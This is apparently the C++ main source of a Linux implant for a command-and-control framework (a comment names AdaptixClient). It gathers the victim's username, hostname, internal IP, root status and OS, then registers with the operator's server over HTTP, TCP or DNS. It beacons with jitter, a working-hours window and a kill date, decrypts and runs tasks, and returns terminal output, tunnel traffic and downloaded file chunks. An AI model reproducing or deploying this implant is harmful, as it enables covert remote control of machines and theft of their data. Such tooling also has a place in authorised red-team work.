#include "agent.hpp"
#include <unistd.h>
#include <sys/utsname.h>
#include <ifaddrs.h>
#include <net/if.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <pwd.h>
#include <ctime>
#include <cstdlib>
#include <cstring>
#include <cerrno>
#include <algorithm>
#include <fstream>
#include <sstream>
#include <climits>
#include <cstdio>
#include <signal.h>

// config.h is generated by the Makefile from the server-side build variables
#include "config.h"

static std::string base_name(const std::string& p){ auto pos=p.find_last_of('/'); return pos==std::string::npos?p:p.substr(pos+1); }
static int parse_int(const char* s,int def);

static std::string get_os_version(){
    std::ifstream f("/etc/os-release");
    if(f){
        std::string line, pretty, name, version;
        while(std::getline(f,line)){
            auto p=line.find('=');
            if(p==std::string::npos) continue;
            std::string k=line.substr(0,p), v=line.substr(p+1);
            if(!v.empty()&&v.front()=='"'){ v.erase(0,1); if(!v.empty()&&v.back()=='"') v.pop_back(); }
            if(k=="PRETTY_NAME") pretty=v;
            else if(k=="NAME") name=v;
            else if(k=="VERSION_ID") version=v;
        }
        if(!pretty.empty()) return pretty;
        if(!name.empty()) return name+(version.empty()?"":" "+version);
    }
    struct utsname u{}; if(uname(&u)==0) return std::string(u.sysname)+" "+u.release;
    return "linux";
}

std::pair<bytes,bytes> create_session_info(){
    std::string proc=base_name([](){ char b[PATH_MAX]; ssize_t n=readlink("/proc/self/exe",b,sizeof(b)-1); if(n>0){b[n]=0; return std::string(b);} return std::string("linux_agent"); }());
    uid_t euid=geteuid(); struct passwd* pw=getpwuid(euid); std::string username=pw?pw->pw_name:std::to_string(euid);
    char host[256]{}; if(gethostname(host,sizeof(host))!=0) host[0]=0;
    std::string ip;
    struct ifaddrs* ifa=nullptr; if(getifaddrs(&ifa)==0){ for(auto p=ifa;p;p=p->ifa_next){ if(p->ifa_addr && p->ifa_addr->sa_family==AF_INET && !(p->ifa_flags&IFF_LOOPBACK)){ char b[INET_ADDRSTRLEN]; inet_ntop(AF_INET,&((sockaddr_in*)p->ifa_addr)->sin_addr,b,sizeof(b)); ip=b; break; } } freeifaddrs(ifa); }
    struct utsname u{}; uname(&u);
    std::string arch=u.machine;
    if(arch=="x86_64") arch="amd64";
    else if(arch=="aarch64") arch="arm64";
    int sleep=parse_int(AGENT_RECONN,10); if(sleep<=0) sleep=1; if(sleep>604800) sleep=604800;
    int jitter=parse_int(AGENT_JITTER,0); if(jitter<0) jitter=0; if(jitter>100) jitter=100;
    bytes key(16,0); random_bytes(key,16);
    bytes info;
    if (std::string(AGENT_TRANSPORT) == "dns") {
        // DNS transport: the registration beat must fit inside a single DNS
        // qname (<=255 bytes).  The Linux server plugin already defaults Os to
        // OS_LINUX and Arch to x64, so those fields are omitted here to leave
        // room for the metadata that AdaptixClient displays (process, pid, user,
        // host, internal IP and elevated).  Domain and OS description are filled
        // by the server-side plugin with safe fallbacks ("(none)"/"Linux").
        std::string short_proc = proc;
        if (short_proc.empty() || short_proc.size() > 16) short_proc = "agent";

        std::vector<std::pair<std::string,bytes>> dns_fields = {
            {"process",mp_str(short_proc)},
            {"user",mp_str(username)},
            {"host",mp_str(host)},
            {"ipaddr",mp_str(ip)},
            {"elevated",mp_bool(euid==0)},
            {"encrypt_key",mp_bin(key)}
        };

        if (arch != "amd64") {
            dns_fields.push_back({"arch",mp_str(arch)});
            dns_fields.erase(std::remove_if(dns_fields.begin(), dns_fields.end(),
                [](const std::pair<std::string,bytes>& p){ return p.first == "elevated"; }),
                dns_fields.end());
        }

        info = mp_map(dns_fields);
    } else {
        info = mp_map({
            {"process",mp_str(proc)},
            {"pid",mp_i64(getpid())},
            {"user",mp_str(username)},
            {"host",mp_str(host)},
            {"ipaddr",mp_str(ip)},
            {"elevated",mp_bool(euid==0)},
            {"os",mp_str("linux")},
            {"arch",mp_str(arch)},
            {"os_version",mp_str(get_os_version())},
            {"sleep",mp_i64(sleep)},
            {"jitter",mp_i64(jitter)},
            {"encrypt_key",mp_bin(key)}
        });
    }
    return {info,key};
}

static int parse_int(const char* s,int def){
    if(!s||!*s) return def;
    char* end=nullptr; errno=0;
    long v=strtol(s,&end,10);
    if(errno!=0 || end==s) return def;
    if(v<INT_MIN || v>INT_MAX) return def;
    return (int)v;
}
static void agent_sleep_ms(long long ms){
    if(ms<=0) return;
    struct timespec ts;
    ts.tv_sec = ms/1000;
    ts.tv_nsec = (long)(ms%1000)*1000000L;
    while(nanosleep(&ts,&ts)!=0 && errno==EINTR){}
}

static long long jittered_sleep_ms(int base_sec,int jit){
    long long base=((long long)base_sec)*1000LL;
    if(jit<=0) return base;
    long long half=base*(long long)jit/100LL; if(half<=0) return base;
    bytes rb; random_bytes(rb,4);
    uint32_t rv=(uint32_t)rb[0]<<24|(uint32_t)rb[1]<<16|(uint32_t)rb[2]<<8|rb[3];
    long long range=half*2LL+1LL;
    long long delta=(long long)(rv % (uint32_t)range) - half;
    return base+delta;
}
static bool kill_date_passed(){
    const char* kd=AGENT_KILL_DATE; if(!kd||!*kd) return false;
    struct tm t{}; if(strptime(kd,"%d.%m.%Y %H:%M:%S",&t)==nullptr) return false;
    time_t kt=mktime(&t); if(kt==(time_t)-1) return false;
    return time(nullptr)>kt;
}
static bool in_working_time(){
    const char* wt=AGENT_WORKING_TIME; if(!wt||!*wt) return true;
    std::string s(wt); auto p=s.find('-'); if(p==std::string::npos) return true;
    auto hm=[](const std::string& x)->int{
        auto c=x.find(':');
        if(c==std::string::npos) return -1;
        int h=parse_int(x.substr(0,c).c_str(),-1);
        int m=parse_int(x.substr(c+1).c_str(),-1);
        if(h<0||h>23||m<0||m>59) return -1;
        return h*60+m;
    };
    int start=hm(s.substr(0,p)), end=hm(s.substr(p+1));
    if(start<0||end<0) return true;
    time_t now=time(nullptr); struct tm lt; localtime_r(&now,&lt); int cur=lt.tm_hour*60+lt.tm_min;
    if(start<=end) return cur>=start&&cur<=end;
    return cur>=start||cur<=end;
}
static std::string transport_name(){ std::string t=AGENT_TRANSPORT; return t.empty()?"http":t; }
static bool is_stream_transport(){ std::string t=transport_name(); return t=="tcp"||t=="gopher"||t=="gophertcp"; }

int run_agent(int, char**){
    signal(SIGPIPE, SIG_IGN);
    signal(SIGHUP, SIG_IGN);
    bytes enc_key=hex_decode(AGENT_ENC_KEY); if(enc_key.empty()) enc_key.assign(16,0);
    int base_sleep=parse_int(AGENT_RECONN,10); if(base_sleep<=0) base_sleep=1;
    if(base_sleep>604800) base_sleep=604800; // cap: 7 days
    int jitter=parse_int(AGENT_JITTER,0); if(jitter<0) jitter=0; if(jitter>100) jitter=100;
    extern int sleep_sec,sleep_jit; sleep_sec=base_sleep; sleep_jit=jitter;

    auto si=create_session_info();
    bytes info=si.first; bytes session_key=si.second;
    uint32_t agent_id; { bytes r(4); random_bytes(r,4); agent_id=(uint32_t)r[0]<<24|(uint32_t)r[1]<<16|(uint32_t)r[2]<<8|r[3]; }
    uint32_t watermark=(uint32_t)strtoul(AGENT_WATERMARK,nullptr,16);
    bytes beat; beat.reserve(8+info.size()); beat.push_back((uint8_t)(watermark>>24)); beat.push_back((uint8_t)(watermark>>16)); beat.push_back((uint8_t)(watermark>>8)); beat.push_back((uint8_t)watermark);
    beat.push_back((uint8_t)(agent_id>>24)); beat.push_back((uint8_t)(agent_id>>16)); beat.push_back((uint8_t)(agent_id>>8)); beat.push_back((uint8_t)agent_id);
    beat.insert(beat.end(),info.begin(),info.end());

    auto trans=make_transport(beat,session_key);
    bytes payload;
    if(is_stream_transport()){
        bytes empty_msg=mp_map({{"type",mp_i64(0)},{"object",mp_array({})}});
        payload=aes_gcm_encrypt(empty_msg,session_key);
    }
    bool first=true;
    while(ACTIVE){
        if(kill_date_passed()) break;
        if(!first) agent_sleep_ms(jittered_sleep_ms(sleep_sec,sleep_jit));
        first=false;
        if(!in_working_time()) continue;

        bytes recv;
        if(!trans->exchange(payload,recv)){
            payload.clear();
            continue;
        }
        int pre=parse_int(AGENT_ANS_PRE,0), suf=parse_int(AGENT_ANS_SUF,0);
        if(trans->needs_strip() && (int)recv.size()>=pre+suf){
            recv.erase(recv.begin(),recv.begin()+pre);
            recv.erase(recv.end()-suf,recv.end());
        }
        std::vector<bytes> results;
        if(!recv.empty()){
            bytes dec;
            if(!aes_gcm_decrypt(recv,session_key,dec)){ payload.clear(); continue; }
            try{
                MpReader mr{dec}; uint32_t n=mr.read_map();
                for(uint32_t i=0;i<n;i++){
                    std::string k=mr.read_str();
                    if(k=="type"){ mr.read_i64(); }
                    else if(k=="object"){
                        uint32_t m=mr.read_array();
                        for(uint32_t j=0;j<m;j++){
                            bytes raw=mr.read_bin();
                            bytes r=task_process(raw);
                            if(!r.empty()) results.push_back(r);
                        }
                    }
                    else mr.skip_value();
                }
            }catch(...){ payload.clear(); continue; }
        }

        for(auto& c:collect_tunnel_accepts()) results.push_back(c);
        for(auto& c:collect_tunnel_output()) results.push_back(c);
        for(auto& c:collect_terminal_output()) results.push_back(c);
        for(auto& c:collect_download_chunks()) results.push_back(c);


        if(!results.empty()){
            std::vector<bytes> obj; for(auto& rr:results) obj.push_back(mp_bin(rr)); bytes msg=mp_map({{"type",mp_i64(1)},{"object",mp_array(obj)}});
            payload=aes_gcm_encrypt(msg,session_key);
        } else if(is_stream_transport()){
            bytes empty_msg=mp_map({{"type",mp_i64(0)},{"object",mp_array({})}});
            payload=aes_gcm_encrypt(empty_msg,session_key);
        } else {
            payload.clear();
        }
    }
    cleanup_agent_resources();
    return 0;
}

int main(int argc,char** argv){ return run_agent(argc,argv); }
